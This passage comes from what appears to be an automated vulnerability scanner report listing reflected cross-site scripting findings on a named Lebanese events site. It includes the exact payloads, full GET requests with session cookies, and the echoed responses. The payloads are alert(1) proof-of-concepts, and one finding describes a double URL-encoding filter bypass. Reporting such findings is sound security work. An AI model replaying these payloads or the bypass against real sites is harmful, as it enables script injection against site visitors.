Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 06:41:15 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Index';
var initfacebox='';
var contactid='6081807bf';alert(1)//80b93cb571a';
var showfacebox='';
</script>
...[SNIP]...

4.1135. http://www.beirut.com/ThingsToDo/Quraitem/Letters-A-Play-Directed-by-Grace-Dunya/6081 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Quraitem/Letters-A-Play-Directed-by-Grace-Dunya/6081

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddd56%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea282f73a450 was submitted in the REST URL parameter 4. This input was echoed as ddd56"><script>alert(1)</script>a282f73a450 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /ThingsToDo/Quraitem/Letters-A-Play-Directed-by-Grace-Dunya/6081ddd56%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea282f73a450 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 06:40:58 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a id="moreinfo" rel="facebox" href="/moreInfo.php?contactid=6081ddd56"><script>alert(1)</script>a282f73a450&randstyle=green">
...[SNIP]...

4.1136. http://www.beirut.com/ThingsToDo/Screenings/60463877 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Screenings/60463877

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69c16'-alert(1)-'c728d544247 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ThingsToDo69c16'-alert(1)-'c728d544247/Screenings/60463877 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:01:54 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63140

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='ThingsToDo69c16'-alert(1)-'c728d544247/Screenings';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1137. http://www.beirut.com/ThingsToDo/Screenings/60463877 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/ThingsToDo/Screenings/60463877

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74443"><a>9243be17b5c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDo74443"><a>9243be17b5c/Screenings/60463877 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:50:49 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64201

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=green&indexpage=ThingsToDo74443"><a>9243be17b5c/Screenings&listingtype=events.php&Types=">
...[SNIP]...

4.1138. http://www.beirut.com/ThingsToDo/Screenings/60463877 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/ThingsToDo/Screenings/60463877

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d06f"><a>112cde1d17c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDo/Screenings6d06f"><a>112cde1d17c/60463877 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:05:13 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63480

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=purple&indexpage=ThingsToDo/Screenings6d06f"><a>112cde1d17c&listingtype=events.php&Types=13">
...[SNIP]...

4.1139. http://www.beirut.com/ThingsToDo/Screenings/60463877 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Screenings/60463877

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88e46'-alert(1)-'4ce8cdfba1f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ThingsToDo/Screenings88e46'-alert(1)-'4ce8cdfba1f/60463877 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:15:09 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63503

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='ThingsToDo/Screenings88e46'-alert(1)-'4ce8cdfba1f';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1140. http://www.beirut.com/ThingsToDo/Seminars-and-Lectures/295390016 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/ThingsToDo/Seminars-and-Lectures/295390016

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13dfc"><a>750efc004b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDo13dfc"><a>750efc004b1/Seminars-and-Lectures/295390016 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:44:56 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=orange&indexpage=ThingsToDo13dfc"><a>750efc004b1/Seminars-and-Lectures&listingtype=events.php&Types=">
...[SNIP]...

4.1141. http://www.beirut.com/ThingsToDo/Seminars-and-Lectures/295390016 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Seminars-and-Lectures/295390016

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee8d4'-alert(1)-'45bcf7453a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ThingsToDoee8d4'-alert(1)-'45bcf7453a2/Seminars-and-Lectures/295390016 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:55:19 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63676

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='ThingsToDoee8d4'-alert(1)-'45bcf7453a2/Seminars-and-Lectures';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1142. http://www.beirut.com/ThingsToDo/Seminars-and-Lectures/295390016 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/ThingsToDo/Seminars-and-Lectures/295390016

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33a94"><a>3d75e362c72 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDo/Seminars-and-Lectures33a94"><a>3d75e362c72/295390016 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:05:07 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58994

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=green&indexpage=ThingsToDo/Seminars-and-Lectures33a94"><a>3d75e362c72&listingtype=events.php&Types=9,12">
...[SNIP]...

4.1143. http://www.beirut.com/ThingsToDo/Seminars-and-Lectures/295390016 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Seminars-and-Lectures/295390016

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87a59'-alert(1)-'78cfba14f3d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ThingsToDo/Seminars-and-Lectures87a59'-alert(1)-'78cfba14f3d/295390016 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:18:53 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='ThingsToDo/Seminars-and-Lectures87a59'-alert(1)-'78cfba14f3d';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1144. http://www.beirut.com/ThingsToDo/Theater/706796009 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/ThingsToDo/Theater/706796009

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dacf"><a>76f239c64cc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDo5dacf"><a>76f239c64cc/Theater/706796009 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:56:33 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63279

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=purple&indexpage=ThingsToDo5dacf"><a>76f239c64cc/Theater&listingtype=events.php&Types=">
...[SNIP]...

4.1145. http://www.beirut.com/ThingsToDo/Theater/706796009 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Theater/706796009

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b4b73'-alert(1)-'5f34dcd1202 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ThingsToDob4b73'-alert(1)-'5f34dcd1202/Theater/706796009 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:03:26 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63279

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='ThingsToDob4b73'-alert(1)-'5f34dcd1202/Theater';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1146. http://www.beirut.com/ThingsToDo/Theater/706796009 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/ThingsToDo/Theater/706796009

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4963d"><a>0ce246b6095 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDo/Theater4963d"><a>0ce246b6095/706796009 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:08:56 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=purple&indexpage=ThingsToDo/Theater4963d"><a>0ce246b6095&listingtype=events.php&Types=7">
...[SNIP]...

4.1147. http://www.beirut.com/ThingsToDo/Theater/706796009 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Theater/706796009

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9dc4b'-alert(1)-'c46cc983fae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ThingsToDo/Theater9dc4b'-alert(1)-'c46cc983fae/706796009 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
